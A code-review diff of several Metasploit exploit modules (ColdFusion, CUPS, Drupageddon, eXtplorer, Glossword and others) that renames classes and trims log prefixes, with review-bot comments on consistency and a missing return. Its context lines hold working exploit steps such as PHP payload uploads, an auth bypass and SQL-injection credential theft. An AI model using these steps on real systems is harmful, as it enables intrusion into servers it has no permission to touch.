@@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote war_filename = "#{app_base}.war" war_location = target['AutoDeployPath'] - print_status("#{peer} - Uploading WAR file #{war_filename}...") + print_status("Uploading WAR file #{war_filename}...") res = upload_file(war_location, war_filename, war) if res @@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)), diff --git a/modules/exploits/multi/http/coldfusion_rds.rb b/modules/exploits/multi/http/coldfusion_rds.rb index bdeb327d67..d080bbed55 100644 --- a/modules/exploits/multi/http/coldfusion_rds.rb +++ b/modules/exploits/multi/http/coldfusion_rds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.to_s =~ /ColdFusion Administrator Login/ - vprint_good "#{peer} - Administrator access available" + vprint_good "Administrator access available" else return Exploit::CheckCode::Safe end @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote imghash = "596b3fc4f1a0b818979db1cf94a82220" if img == imghash - vprint_good "#{peer} - ColdFusion 9 Detected" + vprint_good "ColdFusion 9 Detected" else return Exploit::CheckCode::Safe end 
@@ -192,8 +192,8 @@ class Metasploit3 < Msf::Exploit::Remote def exec_payload uri = target_uri.path - print_status("#{peer} - Our payload is at: #{peer}\\#{datastore['CFIDDIR']}\\#{@filename}") - print_status("#{peer} - Executing payload...") + print_status("Our payload is at: #{peer}\\#{datastore['CFIDDIR']}\\#{@filename}") + print_status("Executing payload...") res = send_request_cgi({ 'method' => 'GET', @@ -207,7 +207,7 @@ class Metasploit3 < Msf::Exploit::Remote @filename = rand_text_alpha(8+rand(8)) + ".cfm" #numbers is a bad idea taskname = rand_text_alpha(8+rand(8)) #numbers is a bad idea - print_status "#{peer} - Trying to upload payload via scheduled task..." + print_status "Trying to upload payload via scheduled task..." res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'adminapi', 'administrator.cfc'), @@ -238,7 +238,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.to_s =~ /ColdFusion Administrator Login/ - print_good("#{peer} - Logged in as Administrator!") + print_good("Logged in as Administrator!") else fail_with(Failure::Unknown, "#{peer} - Login Failed") end @@ -259,12 +259,12 @@ class Metasploit3 < Msf::Exploit::Remote if res.body =~ /<input type="text" maxlength="550" name="directoryPath" value="(.*)" size="40" id="dirpath">/ file_path = $1 - print_good("#{peer} - File path disclosed! #{file_path}") + print_good("File path disclosed! #{file_path}") else fail_with(Failure::Unknown, "#{peer} - Unable to get upload filepath") end - print_status("#{peer} - Adding scheduled task") + print_status("Adding scheduled task") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduleedit.cfm'), 
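Review bot: The -238,7 hunk removes the `#{peer} - ` prefix from `print_good` but leaves it in the adjacent `fail_with(Failure::Unknown, "#{peer} - Login Failed")`, so the success and failure messages for the same step are now built differently. The commit appears to assume the print helpers add the peer themselves, which is not visible here. If failure messages are rendered through the same path, the peer would be printed twice, and `fail_with(Failure::Unknown, 'Login Failed')` would match the new style. If they are not, a line in the commit description saying why `fail_with` keeps the prefix would save the next reader the check. The same split shows in the -259,12 hunk here, in the -287,7 and -299,12 hunks of this file, and in the cups_bash_env_exec.rb, extplorer_upload_exec.rb and glossword_upload_exec.rb hunks.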
@@ -287,7 +287,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Scheduled task failed") end - print_status("#{peer} - Running scheduled task") + print_status("Running scheduled task") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'), @@ -299,12 +299,12 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.to_s =~ /This scheduled task was completed successfully/ - print_good("#{peer} - Scheduled task completed successfully") + print_good("Scheduled task completed successfully") else fail_with(Failure::Unknown, "#{peer} - Scheduled task failed") end - print_status("#{peer} - Deleting scheduled task") + print_status("Deleting scheduled task") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'), @@ -316,7 +316,7 @@ class Metasploit3 < Msf::Exploit::Remote }) unless res and res.code == 200 - print_error("#{peer} - Scheduled task deletion failed, cleanup might be needed!") + print_error("Scheduled task deletion failed, cleanup might be needed!") end end end diff --git a/modules/exploits/multi/http/cups_bash_env_exec.rb b/modules/exploits/multi/http/cups_bash_env_exec.rb index 399846da49..c8d35b9342 100644 --- a/modules/exploits/multi/http/cups_bash_env_exec.rb +++ b/modules/exploits/multi/http/cups_bash_env_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
@@ -88,21 +88,21 @@ class Metasploit4 < Msf::Exploit::Remote printer_name = rand_text_alphanumeric(10 + rand(5)) res = add_printer(printer_name, '') if !res - vprint_error("#{peer} - No response from host") + vprint_error("No response from host") return Exploit::CheckCode::Unknown elsif res.headers['Server'] =~ /CUPS\/([\d\.]+)/ - vprint_status("#{peer} - Found CUPS version #{$1}") + vprint_status("Found CUPS version #{$1}") else - print_status("#{peer} - Target is not a CUPS web server") + print_status("Target is not a CUPS web server") return Exploit::CheckCode::Safe end if res.body =~ /Set Default Options for #{printer_name}/ - vprint_good("#{peer} - Added printer successfully") + vprint_good("Added printer successfully") delete_printer(printer_name) - elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) - vprint_error("#{peer} - Authentication failed") + elsif res.code == 401 || (res.code == 426 && datastore['SSL']) + vprint_error("Authentication failed") elsif res.code == 426 - vprint_error("#{peer} - SSL required - set SSL true") + vprint_error("SSL required - set SSL true") end Exploit::CheckCode::Detected end @@ -128,8 +128,8 @@ class Metasploit4 < Msf::Exploit::Remote if !res fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.") elsif res.body =~ /Set Default Options for #{printer_name}/ - print_good("#{peer} - Added printer successfully") - elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) + print_good("Added printer successfully") + elsif res.code == 401 || (res.code == 426 && datastore['SSL']) fail_with(Failure::NoAccess, "#{peer} - Could not add printer - Authentication failed.") elsif res.code == 426 fail_with(Failure::BadConfig, "#{peer} - Could not add printer - SSL required - set SSL true.") 
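Review bot: In the -88,21 hunk, `datastore['SSL'] == true` becomes `datastore['SSL']`, which is a behaviour change inside an otherwise mechanical prefix cleanup. Any value other than `nil` or `false`, including the string `"false"`, now selects the "Authentication failed" branch on a 426 response instead of falling through to "SSL required". Whether the datastore can hold an unnormalised string at this point is not visible here. If it can, keep the strict form `(res.code == 426 && datastore['SSL'] == true)`; otherwise mention the normalisation the new test relies on in the commit description. The same edit is repeated in the -128,8, -144,8 and -158,13 hunks of this file.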
@@ -144,8 +144,8 @@ class Metasploit4 < Msf::Exploit::Remote if !res fail_with(Failure::Unreachable, "#{peer} - Could not add test page to print queue - Connection failed.") elsif res.body =~ /Test page sent; job ID is/ - vprint_good("#{peer} - Added test page to printer queue") - elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) + vprint_good("Added test page to printer queue") + elsif res.code == 401 || (res.code == 426 && datastore['SSL']) fail_with(Failure::NoAccess, "#{peer} - Could not add test page to print queue - Authentication failed.") elsif res.code == 426 fail_with(Failure::BadConfig, "#{peer} - Could not add test page to print queue - SSL required - set SSL true.") @@ -158,13 +158,13 @@ class Metasploit4 < Msf::Exploit::Remote if !res fail_with(Failure::Unreachable, "#{peer} - Could not delete printer - Connection failed.") elsif res.body =~ /has been deleted successfully/ - print_status("#{peer} - Deleted printer '#{printer_name}' successfully") - elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) - vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - Authentication failed.") + print_status("Deleted printer '#{printer_name}' successfully") + elsif res.code == 401 || (res.code == 426 && datastore['SSL']) + vprint_warning("Could not delete printer '#{printer_name}' - Authentication failed.") elsif res.code == 426 - vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - SSL required - set SSL true.") + vprint_warning("Could not delete printer '#{printer_name}' - SSL required - set SSL true.") else - vprint_warning("#{peer} - Could not delete printer '#{printer_name}'") + vprint_warning("Could not delete printer '#{printer_name}'") end end 
@@ -172,7 +172,7 @@ class Metasploit4 < Msf::Exploit::Remote # Add a printer to CUPS # def add_printer(printer_name, cmd) - vprint_status("#{peer} - Adding new printer '#{printer_name}'") + vprint_status("Adding new printer '#{printer_name}'") ppd_name = "#{rand_text_alphanumeric(10 + rand(5))}.ppd" ppd_file = <<-EOF @@ -241,7 +241,7 @@ EOF # Queue a printer test page # def print_test_page(printer_name) - vprint_status("#{peer} - Adding test page to printer queue") + vprint_status("Adding test page to printer queue") send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'printers', printer_name), @@ -258,7 +258,7 @@ EOF # Delete a printer # def delete_printer(printer_name) - vprint_status("#{peer} - Deleting printer '#{printer_name}'") + vprint_status("Deleting printer '#{printer_name}'") send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin'), diff --git a/modules/exploits/multi/http/cuteflow_upload_exec.rb b/modules/exploits/multi/http/cuteflow_upload_exec.rb index 63fc450568..1775c6d41c 100644 --- a/modules/exploits/multi/http/cuteflow_upload_exec.rb +++ b/modules/exploits/multi/http/cuteflow_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
@@ -101,17 +101,17 @@ class Metasploit3 < Msf::Exploit::Remote base << '/' if base[-1, 1] != '/' # upload PHP payload to upload/___1/ - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") fname = rand_text_alphanumeric(rand(10)+6) + '.php' php = %Q|<?php #{payload.encoded} ?>| res = upload(base, fname, php) if res.nil? - print_error("#{peer} - Uploading PHP payload failed") + print_error("Uploading PHP payload failed") return end # retrieve and execute PHP payload - print_status("#{peer} - Retrieving file: #{fname}") + print_status("Retrieving file: #{fname}") send_request_raw({ 'method' => 'GET', 'uri' => normalize_uri(base, "upload/___1/#{fname}") diff --git a/modules/exploits/multi/http/dexter_casinoloader_exec.rb b/modules/exploits/multi/http/dexter_casinoloader_exec.rb index 71c1b0a0c1..fd8d55a9c8 100644 --- a/modules/exploits/multi/http/dexter_casinoloader_exec.rb +++ b/modules/exploits/multi/http/dexter_casinoloader_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
@@ -107,19 +107,19 @@ class Metasploit3 < Msf::Exploit::Remote def exploit payload_name = rand_text_alpha(rand(10) + 5) + '.php' - print_status("#{peer} - Using SQL injection to acquire credentials") + print_status("Using SQL injection to acquire credentials") user = database_get_field('users', 'name', 0) if user == false - print_error("#{peer} - Failed to acquire administrator username") + print_error("Failed to acquire administrator username") return end password = database_get_field('users', 'password', 0) if password == false - print_error("#{peer} - Failed to acquire administrator password") + print_error("Failed to acquire administrator password") end - print_status("#{peer} - Using #{user}:#{password}") + print_status("Using #{user}:#{password}") res = send_request_cgi({ 'method' => 'POST', @@ -135,9 +135,9 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.headers.has_key?('Location') login_cookie = res.get_cookies - print_status("#{peer} - Login successful") + print_status("Login successful") else - print_error("#{peer} - Failed to log in") + print_error("Failed to log in") return end @@ -146,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part("<?php #{payload.encoded} ?>", nil, nil, "form-data; name=\"uploadedfile\"; filename=\"#{payload_name}\"") post_data = data.to_s - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => upload, @@ -159,11 +159,11 @@ class Metasploit3 < Msf::Exploit::Remote path = $1 path = path.sub! "\\", "/" target_path = normalize_uri(target_uri.path, path) - print_status("#{peer} - Requesting: #{target_path}") + print_status("Requesting: #{target_path}") send_request_raw({'uri' => normalize_uri(target_path)}) handler else - print_error("#{peer} - Failed to upload file") + print_error("Failed to upload file") return end end 
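Review bot: In the -107,19 hunk the password branch has no `return` after `print_error("Failed to acquire administrator password")`, unlike the username branch just above it. Execution therefore continues to `print_status("Using #{user}:#{password}")` with `password` set to `false`, and presumably on to the login request that follows. Adding `return` after the `print_error` makes both lookups stop the run the same way. `exploit` continues past the end of this hunk.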
diff --git a/modules/exploits/multi/http/drupal_drupageddon.rb b/modules/exploits/multi/http/drupal_drupageddon.rb index d7fe87b82c..38f32cb614 100644 --- a/modules/exploits/multi/http/drupal_drupageddon.rb +++ b/modules/exploits/multi/http/drupal_drupageddon.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -112,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote md5_base64 = phpass_encode64(md5, md5.length) md5_stripped = md5_base64[0...22] pass = "$P\\$" + iter_char + salt + md5_stripped - vprint_status("#{peer} - password hash: #{pass}") + vprint_status("password hash: #{pass}") return pass end @@ -129,8 +129,8 @@ class Metasploit3 < Msf::Exploit::Remote form_build_id = $1 if content =~ /name="form_build_id" value="(.+?)"/ form_token = $1 if content =~ /name="form_token" value="(.+?)"/ - vprint_status("#{peer} - form_build_id: #{form_build_id}") - vprint_status("#{peer} - form_token: #{form_token}") + vprint_status("form_build_id: #{form_build_id}") + vprint_status("form_token: #{form_token}") return form_build_id, form_token end @@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote # TODO: Check if option admin_role exists via admin/people/permissions/roles # call login page to extract tokens - print_status("#{peer} - Testing page") + print_status("Testing page") res = send_request_cgi({ 'uri' => uri_path, 'vars_get' => { @@ -166,7 +166,7 @@ class Metasploit3 < Msf::Exploit::Remote 'op' => 'Log in' } - print_status("#{peer} - Creating new user #{user}:#{pass}") + print_status("Creating new user #{user}:#{pass}") res = send_request_cgi({ 'uri' => uri_path, 'method' => 'POST', 
@@ -181,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote end # login - print_status("#{peer} - Logging in as #{user}:#{pass}") + print_status("Logging in as #{user}:#{pass}") res = send_request_cgi({ 'uri' => uri_path, 'method' => 'POST', @@ -202,10 +202,10 @@ class Metasploit3 < Msf::Exploit::Remote end cookie = res.get_cookies - vprint_status("#{peer} - cookie: #{cookie}") + vprint_status("cookie: #{cookie}") # call admin interface to extract CSRF token and enabled modules - print_status("#{peer} - Trying to parse enabled modules") + print_status("Trying to parse enabled modules") res = send_request_cgi({ 'uri' => uri_path, 'vars_get' => { @@ -236,7 +236,7 @@ class Metasploit3 < Msf::Exploit::Remote end # enable PHP filter - print_status("#{peer} - Enabling the PHP filter module") + print_status("Enabling the PHP filter module") res = send_request_cgi({ 'uri' => uri_path, 'method' => 'POST', @@ -253,7 +253,7 @@ class Metasploit3 < Msf::Exploit::Remote # Response: http 302, Location: http://10.211.55.50/?q=admin/modules - print_status("#{peer} - Setting permissions for PHP filter module") + print_status("Setting permissions for PHP filter module") # allow admin to use php_code res = send_request_cgi({ @@ -280,7 +280,7 @@ class Metasploit3 < Msf::Exploit::Remote # get administrator role id id = $1 if res.body =~ /for="edit-([0-9]+)-administer-content-types">#{admin_role}:/ - vprint_status("#{peer} - admin role id: #{id}") + vprint_status("admin role id: #{id}") unless id fail_with(Failure::Unknown, "Could not parse out administrator ID") @@ -313,7 +313,7 @@ class Metasploit3 < Msf::Exploit::Remote end # Add new Content page (extract csrf token) - print_status("#{peer} - Getting tokens from create new article page") + print_status("Getting tokens from create new article page") res = send_request_cgi({ 'uri' => uri_path, 'vars_get' => { 
@@ -342,7 +342,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part('1', nil, nil, 'form-data; name="promote"') post_data = data.to_s - print_status("#{peer} - Calling preview page. Exploit should trigger...") + print_status("Calling preview page. Exploit should trigger...") send_request_cgi( 'method' => 'POST', 'uri' => uri_path, diff --git a/modules/exploits/multi/http/eaton_nsm_code_exec.rb b/modules/exploits/multi/http/eaton_nsm_code_exec.rb index b25107fc24..aa9ea2ce7f 100644 --- a/modules/exploits/multi/http/eaton_nsm_code_exec.rb +++ b/modules/exploits/multi/http/eaton_nsm_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/eventlog_file_upload.rb b/modules/exploits/multi/http/eventlog_file_upload.rb index 0f1d3770c3..442cb13d75 100644 --- a/modules/exploits/multi/http/eventlog_file_upload.rb +++ b/modules/exploits/multi/http/eventlog_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote data = post_data.to_s if is_payload - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") end res = send_request_cgi({ 'uri' => (@my_target == targets[1] ? normalize_uri("/event/agentUpload") : normalize_uri("agentUpload")), @@ -144,7 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body.empty? if is_payload - print_status("#{peer} - Payload uploaded successfully") + print_status("Payload uploaded successfully") end register_files_for_cleanup(target_path.gsub("../../", "../")) return true 
@@ -157,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote def pick_target return target if target.name != 'Automatic' - print_status("#{peer} - Determining target") + print_status("Determining target") version = get_version @@ -308,7 +308,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Payload upload failed") end - print_status("#{peer} - Waiting " + datastore['SLEEP'].to_s + " seconds for EAR deployment...") + print_status("Waiting " + datastore['SLEEP'].to_s + " seconds for EAR deployment...") sleep(datastore['SLEEP']) return normalize_uri(ear_app_base, war_app_base, rand_text_alphanumeric(4 + rand(32 - 4))) end @@ -322,10 +322,10 @@ class Metasploit3 < Msf::Exploit::Remote @my_target = pick_target if @my_target.nil? - print_error("#{peer} - Unable to select a target, we must bail.") + print_error("Unable to select a target, we must bail.") return else - print_status("#{peer} - Selected target #{@my_target.name}") + print_status("Selected target #{@my_target.name}") end if @my_target == targets[1] @@ -334,7 +334,7 @@ class Metasploit3 < Msf::Exploit::Remote exploit_path = exploit_native end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri(exploit_path), 'method' => 'GET' diff --git a/modules/exploits/multi/http/extplorer_upload_exec.rb b/modules/exploits/multi/http/extplorer_upload_exec.rb index 1289010cbd..a9208b1b86 100644 --- a/modules/exploits/multi/http/extplorer_upload_exec.rb +++ b/modules/exploits/multi/http/extplorer_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -141,16 +141,16 @@ class Metasploit3 < Msf::Exploit::Remote datastore['COOKIE'] = "eXtplorer="+rand_text_alpha_lower(26)+";" # bypass auth - print_status("#{peer} - Authenticating as user (#{user})") + print_status("Authenticating as user (#{user})") res = auth_bypass(base, user) if res and res.code == 200 and res.body =~ /Are you sure you want to delete these/ - print_status("#{peer} - Authenticated successfully") + print_status("Authenticated successfully") else fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end # search for writable directories - print_status("#{peer} - Retrieving writable subdirectories") + print_status("Retrieving writable subdirectories") begin res = send_request_cgi({ 'method' => 'POST', 
@@ -163,19 +163,19 @@ class Metasploit3 < Msf::Exploit::Remote end if res and res.code == 200 and res.body =~ /\{'text':'([^']+)'[^\}]+'is_writable':true/ dir = "#{base}#{$1}" - print_status("#{peer} - Successfully retrieved writable subdirectory (#{$1})") + print_status("Successfully retrieved writable subdirectory (#{$1})") else dir = "#{base}" - print_error("#{peer} - Could not find a writable subdirectory.") + print_error("Could not find a writable subdirectory.") end # upload PHP payload - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes) to #{dir}") + print_status("Uploading PHP payload (#{payload.encoded.length.to_s} bytes) to #{dir}") php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, dir, @fname, php) if res and res.code == 200 and res.body =~ /'message':'Upload successful\!'/ - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed") end @@ -184,7 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote end # search directories in the web root for the file - print_status("#{peer} - Searching directories for file (#{@fname})") + print_status("Searching directories for file (#{@fname})") begin res = send_request_cgi({ 'method' => 'POST', @@ -197,13 +197,13 @@ class Metasploit3 < Msf::Exploit::Remote end if res and res.code == 200 and res.body =~ /'dir':'\\\/([^']+)'/ dir = $1.gsub('\\','') - print_good("#{peer} - Successfully found file") + print_good("Successfully found file") else - print_error("#{peer} - Failed to find file") + print_error("Failed to find file") end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (/#{dir}/#{@fname})") + print_status("Executing payload (/#{dir}/#{@fname})") begin send_request_cgi({ 'method' => 'GET', 
@@ -213,7 +213,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Connection failed") end if res and res.code != 200 - print_error("#{peer} - Executing payload failed") + print_error("Executing payload failed") end end end diff --git a/modules/exploits/multi/http/familycms_less_exec.rb b/modules/exploits/multi/http/familycms_less_exec.rb index 07e3741261..47fa520192 100644 --- a/modules/exploits/multi/http/familycms_less_exec.rb +++ b/modules/exploits/multi/http/familycms_less_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/freenas_exec_raw.rb b/modules/exploits/multi/http/freenas_exec_raw.rb index da1dbb571e..0911ea8a47 100644 --- a/modules/exploits/multi/http/freenas_exec_raw.rb +++ b/modules/exploits/multi/http/freenas_exec_raw.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/gestioip_exec.rb b/modules/exploits/multi/http/gestioip_exec.rb index 7b7162bb13..5f4c75ebb5 100644 --- a/modules/exploits/multi/http/gestioip_exec.rb +++ b/modules/exploits/multi/http/gestioip_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/git_client_command_exec.rb b/modules/exploits/multi/http/git_client_command_exec.rb index 566cfea515..3f4972cdc2 100644 --- a/modules/exploits/multi/http/git_client_command_exec.rb +++ b/modules/exploits/multi/http/git_client_command_exec.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/multi/http/gitlab_shell_exec.rb b/modules/exploits/multi/http/gitlab_shell_exec.rb index 5f1b1054dc..730692f081 100644 --- a/modules/exploits/multi/http/gitlab_shell_exec.rb +++ b/modules/exploits/multi/http/gitlab_shell_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/gitorious_graph.rb b/modules/exploits/multi/http/gitorious_graph.rb index 8258c0e9f1..aa70e5f6ce 100644 --- a/modules/exploits/multi/http/gitorious_graph.rb +++ b/modules/exploits/multi/http/gitorious_graph.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb index 43782be301..dadd0efdc8 100644 --- a/modules/exploits/multi/http/glassfish_deployer.rb +++ b/modules/exploits/multi/http/glassfish_deployer.rb @@ -8,7 +8,7 @@ require 'nokogiri' require 'metasploit/framework/login_scanner/glassfish' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/glossword_upload_exec.rb b/modules/exploits/multi/http/glossword_upload_exec.rb index 0aa285ac06..1894ddd170 100644 --- a/modules/exploits/multi/http/glossword_upload_exec.rb +++ b/modules/exploits/multi/http/glossword_upload_exec.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -54,21 +54,21 @@ class Metasploit3 < Msf::Exploit::Remote pass = datastore['PASSWORD'] # login - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") begin res = login(base, user, pass) if res if res.code == 200 - vprint_error("#{peer} - Authentication failed") + vprint_error("Authentication failed") return Exploit::CheckCode::Unknown elsif res.code == 301 and res.get_cookies =~ /sid([\da-f]+)=([\da-f]{32})/ - vprint_good("#{peer} - Authenticated successfully") + vprint_good("Authenticated successfully") return Exploit::CheckCode::Appears end end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") end return Exploit::CheckCode::Safe 
@@ -128,23 +128,23 @@ class Metasploit3 < Msf::Exploit::Remote pass = datastore['PASSWORD'] # login; get session id and token - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") res = login(base, user, pass) if res and res.code == 301 and res.get_cookies =~ /sid([\da-f]+)=([\da-f]{32})/ token = "#{$1}" sid = "#{$2}" - print_good("#{peer} - Authenticated successfully") + print_good("Authenticated successfully") else fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end # upload PHP payload - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length} bytes)") php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, sid, @fname, php) if res and res.code == 301 and res['location'] =~ /Setting saved/ - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed") end @@ -153,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Remote end # retrieve PHP file path - print_status("#{peer} - Locating PHP payload file") + print_status("Locating PHP payload file") begin res = send_request_cgi({ 'method' => 'GET', @@ -166,13 +166,13 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /<img width="" height="" src="([^"]+)"/ shell_uri = "#{$1}" @fname = shell_uri.match('(\d+_[a-zA-Z\d]+\.php)') - print_good("#{peer} - Found payload file path (#{shell_uri})") + print_good("Found payload file path (#{shell_uri})") else fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find PHP payload file path") end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (#{shell_uri})") + print_status("Executing payload (#{shell_uri})") begin send_request_cgi({ 'method' => 'GET', 
